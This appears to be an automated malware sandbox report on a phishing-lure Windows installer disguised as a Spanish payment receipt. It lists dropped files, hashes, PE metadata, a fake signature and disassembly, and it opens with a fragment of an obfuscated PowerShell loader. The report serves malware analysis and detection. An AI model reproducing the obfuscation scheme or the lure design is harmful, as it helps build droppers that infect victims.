                                                                                                                                                                                  Preview:$Kejsertiders=$Teardown;........$Processorkort = @'.Eftervi.Occulti$Navl.brLRepriseiDykningnAut gendAlliancsSor imetMisstylr Gash,noEuroko mostario=Rhotaci$NiobesiHKorts gaN ntroplBaandvrvFittitptFulgu arSster,neF mkampd AmylensAlbuebea,ornrooaSkrueblr Fljfl sMut.latfUf,rdradCh onics AlpehoeHistoril HyperssRig,thedLydighea brunheghelpingeO,tettenCrepenyeGalvani2Corrida3Fry,efu4Spr ked;Ne lefi.Afmilitf HemopouEsber snSulforicSkrddert X,losiiUnrecano ndtrren S utak NonderoP MesepieMontigeninitiatiProexerc Faunoli estinalUnde.walExpl.rai Orkan n pasmaegegenscr V gour Uintere(Olegbuf$AgonistAinsweeplT,eeshtm Tmrer oVandmndcS.nkholh IrvingoKi.ometdsagsom.eEkskommnUncorki,Algesia$RecandiYZym phot As.ocir Bagfuli storyen SuturegAfddtsvsImbod irFinitudu Tippe mSa.sonm)Weelfau Bjergba{energik.Hjerner. Chir p$heallbeKReth,asaCabbielstrv ekrsStraaliaEryngiut ,ncarvi Prenoto Semimane stalkeKurtsflr PrintenHa,sanieUltracrsUnplumm Hulkag(Kole,aeDUnt rree plitteb,isconsu H usyst Unell, Thallic'Pen

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Umatilla125.Sea140

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):313127
                                                                                                                                                                                  Entropy (8bit):7.659464645407278
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:fBXtVl2k39Ao5t5uQ3/+fLB8bNiX9px+Sf68lZuB3QMy1HAS6n30:fdtXzNAo5tb+d8g3gi3uiASw30
                                                                                                                                                                                  MD5:3C8436F0E7B9D6C8D25947E4374D179E
                                                                                                                                                                                  SHA1:1BE9130C45876D27F39C2097771090E573697B72
                                                                                                                                                                                  SHA-256:8512544EB0068094F92CD705FD941A0F07F5697D690AA62EA351B1363F348C75
                                                                                                                                                                                  SHA-512:AA229B1E5C66A78D67A06B601E5AAD9B000B4E15BD0A5F15FF001201F228FC9950418CF9B2F205FCA07BE73E70A06383766DA3804341C42C5597BCBEDCC651FD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.t...................jj.H..........................................@....................2..````...99............$.........hhhh..*.....r................dddd.......;;...............................`........................'...^^......;.....(.;.oo..................$$$...........+++.\.<.......................5.........WWW...........................#.........66666....uuu.............................................BBBB............:....4.....E......222...,....6...._..............................I............NN...R.................s...................3............1............................ff.ff..Y.....UU..zzz.................ii.....N..........D............6.............}}..!.....................__.......J.......$...........77..........LL........dd.......OO...a..xxx.....]...UU..8....i.._..........................=............U.y......l...VVV.......))).......ZZZZZ.........u........;;...........h............................GG.xx.......jj...............SSSSS....................bb..............

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Justificante pago-09453256434687.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1106880
                                                                                                                                                                                  Entropy (8bit):7.972434784115188
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:3NrNYoKOHCWJSICvcVU2F3VwV5k7j5awX300zQUGtZQ:d+jEWhvsU2F3VwXgj5aEkHUGtZQ
                                                                                                                                                                                  MD5:4252CD5753DEF4A484FB3313E1029E66
                                                                                                                                                                                  SHA1:19FD0734102E1EEBE6C7F42D530D30E920366E00
                                                                                                                                                                                  SHA-256:96B8248BE606C47B8955A560F3DF160A4C9026CE1956E407DAF177F17549E4F7
                                                                                                                                                                                  SHA-512:471851F39C4D058798BCE13F80C63F38E3F3196132C5FE3068982362D7C9C876670CEF2F768A8DE7ED300669A85C58B367C1B51221617A1D8AE67CDA77B82984
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L....Oa.................f...*.......4............@.......................................@..........................................@...Y.............. ............................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...................................rsrc....Y...@...Z..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Justificante pago-09453256434687.exe:Zone.Identifier

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Kostbare.tes

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5657071
                                                                                                                                                                                  Entropy (8bit):0.15928467329934035
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:hia6UGQo5IgoTcs1teRMojkuNW52cfotYssiEfN5RJhDjTeYJNKUGQ0yyiJ+yDKJ:RLLXHTFL
                                                                                                                                                                                  MD5:7FD6A7B5493B8D6659842CBDAC26F759
                                                                                                                                                                                  SHA1:59ECA4FEF3F72F17B4F87C647836AF1EE0B7B208
                                                                                                                                                                                  SHA-256:F38655E8753CF872BBC92F703C0A23F3CB35EFEA183296B92ADF3672A509162C
                                                                                                                                                                                  SHA-512:C300E5599EB51D0862F806DF1C6274B0D59F75E41132F85C9E47F777CDD7B2E9B67C06BC033CD1FFE1C87A7EDD6B07D3E9DAD2D280EBAB1E22C7CA6291E881F5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:............................................n..............S.......................................................................................................................................................................q...............................................................................................................................................................................................................................................................................................................................................................................................z.............................................................................................................................................................................................................................4..q...................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Phylogenetically.del

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):108656
                                                                                                                                                                                  Entropy (8bit):0.1629399370348107
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:iM4xHhYyQjrwzEa24+rFK3q01Z2FdZe/Gbjd6Ne7GJ:duhYyQjcd++7KFdZKGAw
                                                                                                                                                                                  MD5:ABD3958B383B1C9F43AC4E47DD12BEC4
                                                                                                                                                                                  SHA1:4248CEAF77E8A46BBFA08FC14BDAB5428D7194F6
                                                                                                                                                                                  SHA-256:30E7E92C51752F6CFD747EC30BF29792A819FDA586557B053FF141861BC3EA7B
                                                                                                                                                                                  SHA-512:F6FE0761F4E15D9FCCCE230FCDFC77E95A259A014654FF94A600CBA120F222ED2085B6DC3CFEC7F21177137BD5136AC42894E113EAFD1D21659FF3F14316799B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:............................................................................................................................................................................................................._....................................................................................................................................................................................................................................................................................................................................................................................)...........................................................<.......................................................................i.........................................................................................................................................................................................).......................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\backwashed.car

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):6429709
                                                                                                                                                                                  Entropy (8bit):0.15806775405645646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:VNOwnrRrLv7/6Ngd/3fk7lv70zCxVdw2J+bxTylmmf13Y2jmVnc+1dHiqkGAr/EA:vGD8vB
                                                                                                                                                                                  MD5:F4FF9F83B617854EAA4804F4499C7538
                                                                                                                                                                                  SHA1:C93182B840EBDDB4A16EF90F1B0AE26DC1562FBA
                                                                                                                                                                                  SHA-256:AFA03D58592E5BE1ADF5E352A40CE899BC707BB40CC6CD1EF5930E6302A94C18
                                                                                                                                                                                  SHA-512:2E5C29BD767EEA4939A4B82CD7DD6EC323255D9046D96CE2C1931D617D125AB96ABC1F4B5444097A3A8085356FB7BD894A5C9769710B67823228BD1C371CF756
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...............................................................................................................................................................................................................................................................................................................r.........................................................................................................................................................Q.....................................................................................................................................................................................................................................................................................................................................................................................................................Y........................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\indholdsfortegnelsen.mic

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):7637195
                                                                                                                                                                                  Entropy (8bit):0.1584950093042192
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:DASGeKc+zkfELL9UhjwNNoVJ2zV7S9OrvkoAaqV6zoPv2WHiirTgQKUIZsrj6ZzL:gXK+k
                                                                                                                                                                                  MD5:EB71C6BE6D08F8A7C7C9DA1335DF04C1
                                                                                                                                                                                  SHA1:7B57A40E3F6C44178A25EF465C3E7F5EA3184335
                                                                                                                                                                                  SHA-256:D1D5BFF683EDC3A076382FCFE8C8A28EA1FF6A1C7731A80BAB8FFF0E82A54D07
                                                                                                                                                                                  SHA-512:5ED43E9E6A66F981DEEC765A13A361BCCEFE4E1A38C6847F9DB00F2ED1BF50497E36B6D5398190FB2CB0B191E4DA33A77C7378CDB446169941C84776D7406A48
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...................[.....................................................................................................................................................................................................................uV.......................................................................................................................>......................................................................................................................................................................................................................................................................................................................................................................................................`..............................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\overcutter.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):465
                                                                                                                                                                                  Entropy (8bit):4.255544231677184
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:ZR1EOIygKJPTYEO/OAOLkKARrQdNJdKiXkB9MOyFCZ60WgE:9xIyPtYEO/vlK6QUlE
                                                                                                                                                                                  MD5:2F8A39C6A08A57605F1965012760D560
                                                                                                                                                                                  SHA1:4607DE528A646C0758D7FB322CF9CCFFAFA026B8
                                                                                                                                                                                  SHA-256:37909462973046DA9CD15B9FB1CCD7F92D97C26AF08C83A8D486BA411DC69373
                                                                                                                                                                                  SHA-512:0B2F239E494FCEE5D18812D98E3571F20B049CAF11CEA675CB55E95283A6E99E7A854DD87087EC5F7C402B7A7C760A1AB4B399EA17319C1F9249465E542E2D8D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:pachydermateous bomuldsskjorterne redisseisin minimalists.delikatessehandlens standardfilnavn spillerelater,udstafferingers parallelforskydning ynglepladsernes libanons somatotypically inveigler sammenrendets..tyrannierne coeternally kommandrs colliquative gonidic ringetonen issens hyperanabolic unpicturesque..sminker apporterende campaigner gorvarehandlen radiosender bibelskes.logikfamilier neurotransmission pasfotoerne searchment inrighted couphgens toadfish,

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\tommelskruerne.afs

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2537825
                                                                                                                                                                                  Entropy (8bit):0.15731061171505112
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:ZfmQIC91KjqGcnL63MV1HZDQDVlybvFG7dH9Sf12lqM1FBQWEP3dNaRrwPu1Br0O:Rrc
                                                                                                                                                                                  MD5:6462B1502F14E3329E79F164F0B8EDA9
                                                                                                                                                                                  SHA1:70F60B7634B75DAFA601D70E812D7127F4432AD3
                                                                                                                                                                                  SHA-256:50852368EB9E21692315077EB7DD5E833B4430342695CFF4E70FEF7DF59DCFB7
                                                                                                                                                                                  SHA-512:979F463C29EFDE5C746CE6A34B72DC064BDB9364702C5DB24B567E823B6992E076BDB160979330EDDDA03F9AE4EEB20FD1E656337A2654E43B3B36673820CF45
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...............M....................................................................4.......................................................................................................................R.......{......................................................................k............................................................................................................................................................................................................................................................................................................................................................................................................................................................~.............................................................................................................................................................I.................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsj887A.tmp\nsExec.dll

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\Justificante pago-09453256434687.exe
                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):7168
                                                                                                                                                                                  Entropy (8bit):5.298362543684714
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                                                                                                                                                                                  MD5:675C4948E1EFC929EDCABFE67148EDDD
                                                                                                                                                                                  SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                                                                                                                                                                                  SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                                                                                                                                                                                  SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                  • Filename: pedido-035241.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: uu8v4UUzTU.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: uu8v4UUzTU.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                                  • Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exe, Detection: malicious, Browse
                                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                  Entropy (8bit):7.972434784115188
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                  File name:Justificante pago-09453256434687.exe
                                                                                                                                                                                  File size:1'106'880 bytes
                                                                                                                                                                                  MD5:4252cd5753def4a484fb3313e1029e66
                                                                                                                                                                                  SHA1:19fd0734102e1eebe6c7f42d530d30e920366e00
                                                                                                                                                                                  SHA256:96b8248be606c47b8955a560f3df160a4c9026ce1956e407daf177f17549e4f7
                                                                                                                                                                                  SHA512:471851f39c4d058798bce13f80c63f38e3f3196132c5fe3068982362d7c9c876670cef2f768a8de7ed300669a85c58b367c1b51221617a1d8ae67cda77b82984
                                                                                                                                                                                  SSDEEP:24576:3NrNYoKOHCWJSICvcVU2F3VwV5k7j5awX300zQUGtZQ:d+jEWhvsU2F3VwXgj5aEkHUGtZQ
                                                                                                                                                                                  TLSH:B535230561D5E467E0E14B36F63A18F213AA2D21C8718A2F53257F78BFB12A63D3D325
                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:4e33695d030a3f39

                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                  General

                                                                                                                                                                                  Entrypoint:0x4034f7
                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                  Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                  Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                  Signature Issuer:CN=Tehran, E=Admissory@Nonclinging.Am, O=Tehran, L=Glan Honddu, OU="Tilbyg Cayuses Ethnolinguistic ", S=Wales, C=GB
                                                                                                                                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                  Error Number:-2146762487
                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                  • 02/11/2024 06:34:33 02/11/2025 06:34:33
                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                  • CN=Tehran, E=Admissory@Nonclinging.Am, O=Tehran, L=Glan Honddu, OU="Tilbyg Cayuses Ethnolinguistic ", S=Wales, C=GB
                                                                                                                                                                                  Version:3
                                                                                                                                                                                  Thumbprint MD5:7125B26AD47B1EF2F57A1D334C3ED3CA
                                                                                                                                                                                  Thumbprint SHA-1:B9A39AEB4CB807EE90F2CE94E1298C47D6ED6196
                                                                                                                                                                                  Thumbprint SHA-256:4451356EAE3D4C11E252079D3D3D664D603B200B87E984A189B1629EE40EB0AF
                                                                                                                                                                                  Serial:2DEB645BD81ED6623A453CE607AA7C569CE12379

                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                  Instruction
                                                                                                                                                                                  push ebp
                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                  sub esp, 000003F4h
                                                                                                                                                                                  push ebx
                                                                                                                                                                                  push esi
                                                                                                                                                                                  push edi
                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                  pop edi
                                                                                                                                                                                  xor ebx, ebx
                                                                                                                                                                                  push 00008001h
                                                                                                                                                                                  mov dword ptr [ebp-14h], ebx
                                                                                                                                                                                  mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                                                                                  mov dword ptr [ebp-10h], ebx
                                                                                                                                                                                  call dword ptr [004080CCh]
                                                                                                                                                                                  mov esi, dword ptr [004080D0h]
                                                                                                                                                                                  lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                                  push eax
                                                                                                                                                                                  mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                                                                                  mov dword ptr [ebp-2Ch], ebx
                                                                                                                                                                                  mov dword ptr [ebp-28h], ebx
                                                                                                                                                                                  mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                                                                                  call esi
                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                  jne 00007F680C864DAAh
                                                                                                                                                                                  lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                                  mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                                                                  push eax
                                                                                                                                                                                  call esi
                                                                                                                                                                                  mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                                                                  mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                                                                  sub ax, 00000053h
                                                                                                                                                                                  add ecx, FFFFFFD0h
                                                                                                                                                                                  neg ax
                                                                                                                                                                                  sbb eax, eax
                                                                                                                                                                                  mov byte ptr [ebp-26h], 00000004h
                                                                                                                                                                                  not eax
                                                                                                                                                                                  and eax, ecx
                                                                                                                                                                                  mov word ptr [ebp-2Ch], ax
                                                                                                                                                                                  cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                                                                  jnc 00007F680C864D7Ah
                                                                                                                                                                                  and word ptr [ebp-00000132h], 0000h
                                                                                                                                                                                  mov eax, dword ptr [ebp-00000134h]
                                                                                                                                                                                  movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                                                                  mov dword ptr [0042A2D8h], eax
                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                  mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                                                                  movzx eax, ax
                                                                                                                                                                                  or eax, ecx
                                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                                  mov ch, byte ptr [ebp-2Ch]
                                                                                                                                                                                  movzx ecx, cx
                                                                                                                                                                                  shl eax, 10h
                                                                                                                                                                                  or eax, ecx

                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                  Data Directories

                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x159b8.rsrc
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x10dca00x720
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                  Sections

                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                  .text0x10000x65150x660026e66bea3b62728a217ae7bf343ebc1aFalse0.6615349264705882data6.439707948554623IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .rdata0x80000x139a0x1400691f0273dad50ec603f6fedf850b58eeFalse0.45data5.145774564074664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                  .data0xa0000x203380x6004b75405561a3fcc45b8fe27a6808f3b5False0.4993489583333333data4.013698650446401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .ndata0x2b0000x290000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .rsrc0x540000x159b80x15a0099e35a8b4499e294dd3cd1daedb48858False0.8200754154624278data7.353353976387772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                  Resources

                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                  RT_ICON0x544180x9e8cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9934217009953681
                                                                                                                                                                                  RT_ICON0x5e2a80x3344PNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9758457787259982
                                                                                                                                                                                  RT_ICON0x615f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.41275933609958504
                                                                                                                                                                                  RT_ICON0x63b980x1743PNG image data, 256 x 256, 4-bit colormap, non-interlacedEnglishUnited States0.9952980688497062
                                                                                                                                                                                  RT_ICON0x652e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4580206378986867
                                                                                                                                                                                  RT_ICON0x663880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.5692963752665245
                                                                                                                                                                                  RT_ICON0x672300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.6601985559566786
                                                                                                                                                                                  RT_ICON0x67ad80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.5
                                                                                                                                                                                  RT_ICON0x681400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.5238439306358381
                                                                                                                                                                                  RT_ICON0x686a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6063829787234043
                                                                                                                                                                                  RT_ICON0x68b100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.6747311827956989
                                                                                                                                                                                  RT_ICON0x68df80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.8074324324324325
                                                                                                                                                                                  RT_DIALOG0x68f200x100dataEnglishUnited States0.5234375
                                                                                                                                                                                  RT_DIALOG0x690200x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                  RT_DIALOG0x691400xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                                  RT_DIALOG0x692080x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                  RT_GROUP_ICON0x692680xaedataEnglishUnited States0.632183908045977
                                                                                                                                                                                  RT_VERSION0x693180x274dataEnglishUnited States0.47611464968152867
                                                                                                                                                                                  RT_MANIFEST0x695900x423XML 1.0 document, ASCII text, with very long lines (1059), with no line terminatorsEnglishUnited States0.5127478753541076

                                                                                                                                                                                  Imports

                                                                                                                                                                                  DLLImport
